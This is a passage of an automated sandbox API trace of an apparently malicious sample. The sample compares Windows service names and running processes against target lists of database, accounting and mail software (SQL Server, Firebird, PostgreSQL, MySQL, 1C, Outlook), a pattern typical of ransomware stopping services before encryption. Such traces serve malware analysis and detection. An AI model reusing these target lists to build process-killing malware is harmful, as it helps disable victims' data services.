[0052.854] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0052.854] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0052.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0052.854] lstrlenW (lpString="MpsSvc") returned 6 [0052.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0052.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0052.854] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0052.854] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0052.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0052.854] lstrlenW (lpString="Netman") returned 6 [0052.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0052.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0052.854] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0052.854] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0052.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0052.854] lstrlenW (lpString="netprofm") returned 8 [0052.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0052.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0052.854] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0052.854] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0052.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0052.854] lstrlenW (lpString="NlaSvc") returned 6 [0052.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0052.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0052.854] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0052.854] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0052.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0052.854] lstrlenW (lpString="nsi") returned 3 [0052.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0052.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0052.854] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0052.854] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0052.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0052.855] lstrlenW (lpString="PcaSvc") returned 6 [0052.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0052.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0052.855] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0052.855] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0052.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0052.855] lstrlenW (lpString="PlugPlay") returned 8 [0052.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0052.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0052.855] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0052.855] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0052.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0052.855] lstrlenW (lpString="Power") returned 5 [0052.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0052.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0052.855] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0052.855] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0052.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0052.855] lstrlenW (lpString="ProfSvc") returned 7 [0052.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0052.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0052.855] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0052.855] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0052.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0052.855] lstrlenW (lpString="RpcEptMapper") returned 12 [0052.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.855] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0052.855] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0052.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0052.855] lstrlenW (lpString="RpcSs") returned 5 [0052.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0052.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0052.855] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0052.855] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0052.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0052.855] lstrlenW (lpString="SamSs") returned 5 [0052.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0052.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0052.856] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0052.856] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0052.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0052.856] lstrlenW (lpString="Schedule") returned 8 [0052.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0052.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0052.856] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0052.856] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0052.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0052.856] lstrlenW (lpString="SENS") returned 4 [0052.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0052.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0052.856] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0052.856] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0052.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0052.856] lstrlenW (lpString="ShellHWDetection") returned 16 [0052.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.856] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0052.856] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0052.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0052.856] lstrlenW (lpString="Spooler") returned 7 [0052.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0052.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0052.856] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0052.856] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0052.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0052.856] lstrlenW (lpString="swprv") returned 5 [0052.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0052.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0052.856] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0052.856] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0052.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0052.856] lstrlenW (lpString="SysMain") returned 7 [0052.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0052.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0052.856] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0052.856] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0052.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0052.857] lstrlenW (lpString="Themes") returned 6 [0052.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0052.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0052.857] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0052.857] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0052.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0052.857] lstrlenW (lpString="TrkWks") returned 6 [0052.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0052.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0052.857] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0052.857] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0052.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0052.857] lstrlenW (lpString="UxSms") returned 5 [0052.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0052.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0052.857] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0052.857] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0052.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0052.857] lstrlenW (lpString="VSS") returned 3 [0052.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0052.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0052.857] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0052.857] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0052.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0052.857] lstrlenW (lpString="WdiServiceHost") returned 14 [0052.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0052.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0052.857] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0052.857] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0052.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0052.857] lstrlenW (lpString="WdiSystemHost") returned 13 [0052.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0052.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0052.857] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0052.857] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0052.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0052.857] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0052.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0052.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0052.857] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0052.858] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0052.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0052.858] lstrlenW (lpString="Winmgmt") returned 7 [0052.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0052.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0052.858] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0052.858] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0052.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0052.858] lstrlenW (lpString="WPDBusEnum") returned 10 [0052.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0052.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0052.858] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0052.858] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0052.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0052.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0052.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ac [0052.860] Process32FirstW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0052.860] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0052.861] lstrlenW (lpString="System") returned 6 [0052.861] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0052.861] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0052.861] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0052.861] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0052.861] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0052.861] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0052.861] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0052.861] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0052.862] lstrlenW (lpString="smss.exe") returned 8 [0052.862] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0052.862] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0052.862] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0052.862] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0052.862] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0052.862] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0052.862] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0052.862] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.862] lstrlenW (lpString="csrss.exe") returned 9 [0052.862] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0052.862] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0052.862] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0052.862] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0052.862] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0052.863] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0052.863] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0052.863] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0052.863] lstrlenW (lpString="wininit.exe") returned 11 [0052.863] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0052.863] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0052.863] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0052.863] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.864] lstrlenW (lpString="csrss.exe") returned 9 [0052.864] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0052.865] lstrlenW (lpString="winlogon.exe") returned 12 [0052.865] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0052.866] lstrlenW (lpString="services.exe") returned 12 [0052.866] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0052.867] lstrlenW (lpString="lsass.exe") returned 9 [0052.867] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0052.867] lstrlenW (lpString="lsm.exe") returned 7 [0052.867] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.868] lstrlenW (lpString="svchost.exe") returned 11 [0052.868] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.869] lstrlenW (lpString="svchost.exe") returned 11 [0052.869] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.870] lstrlenW (lpString="svchost.exe") returned 11 [0052.870] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.871] lstrlenW (lpString="svchost.exe") returned 11 [0052.871] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.871] lstrlenW (lpString="svchost.exe") returned 11 [0052.871] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0052.872] lstrlenW (lpString="audiodg.exe") returned 11 [0052.872] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.873] lstrlenW (lpString="svchost.exe") returned 11 [0052.873] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.873] lstrlenW (lpString="svchost.exe") returned 11 [0052.873] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0052.874] lstrlenW (lpString="dwm.exe") returned 7 [0052.874] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0052.874] lstrlenW (lpString="explorer.exe") returned 12 [0052.875] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0052.876] lstrlenW (lpString="spoolsv.exe") returned 11 [0052.876] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0052.877] lstrlenW (lpString="taskhost.exe") returned 12 [0052.877] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.878] lstrlenW (lpString="svchost.exe") returned 11 [0052.878] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0052.878] lstrlenW (lpString="taskeng.exe") returned 11 [0052.878] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0052.879] lstrlenW (lpString="taskhost.exe") returned 12 [0052.879] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0052.879] lstrlenW (lpString="challenging.exe") returned 15 [0052.879] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0052.881] lstrlenW (lpString="pgp prix.exe") returned 12 [0052.881] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0052.882] lstrlenW (lpString="user-reno.exe") returned 13 [0052.882] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0052.883] lstrlenW (lpString="aggregate.exe") returned 13 [0052.883] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0052.883] lstrlenW (lpString="dressed.exe") returned 11 [0052.883] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0052.884] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0052.884] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, 